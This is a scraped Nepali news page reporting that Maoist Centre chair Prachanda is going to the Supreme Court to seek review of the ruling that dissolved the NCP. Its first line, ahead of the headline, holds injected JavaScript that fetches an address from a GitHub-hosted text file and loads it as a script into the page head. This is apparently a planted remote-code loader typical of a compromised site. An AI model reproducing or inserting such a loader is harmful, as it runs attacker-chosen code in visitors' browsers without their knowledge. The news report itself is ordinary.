;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); फैसला पुनरावलोकनका लागि प्रचण्ड सर्वोच्च अदालत जाँदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • फैसला पुनरावलोकनका लागि प्रचण्ड सर्वोच्च अदालत जाँदै
देश/प्रदेश

फैसला पुनरावलोकनका लागि प्रचण्ड सर्वोच्च अदालत जाँदै

चैत १७,

काठमाडौं । नेकपा माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ नेकपा भंग गर्ने फैसलाको पुनरावलोकनका आज सर्वोच्च अदालत जाने भएका छन्।

प्रचण्ड आज बिहान ११ बजे केही नेता तथा कानुन व्यवसायीसँग सर्वोच्च अदालत जान लागेको प्रचण्डका प्रेस संयोजक विष्णु सापकोटाले जानकारी दिए।

सापकोटाका अनुसार अहिले प्रचण्ड वामपन्थी नेता विष्णु बहादुर मानन्धरको अन्तिम श्रद्धाञ्जलीका लागि पशुपति आर्यघाट जाने र त्यहाँबाट फर्किएलगत्तै सर्वोच्च जाने छन्।

सर्वोच्चले नाम विवादको फैसला सुनाउने क्रममा गत फागुन २३ गते नेकपा भंग गर्दै नेकपा एमाले र नेकपा माओवादी केन्द्र ब्यूँताएको थियो। सर्वोच्चको यो फैसला राजनीतिक भएको भन्दै पुनरावलोकनका लागि जाने घोषणा प्रचण्डले गरेका थिए।

कट्टेलले नेतृत्व गरेको दल २०७० साउन २२ मा निर्वाचन आयोगमा दर्ता भएको थियो। निर्वाचन आयोगमा कट्टेल नेतृत्वको नेकपाको दर्ता आयोगमा कायमै थियो। अदालतको निर्णयपछि नेकपा माओवादी केन्द्र र एमाले साविकको अवस्थामा फर्केर आ–आफ्नो गतिविधि बढाइरहेका छन्।

 

फेसबुक प्रतिक्रियाहरु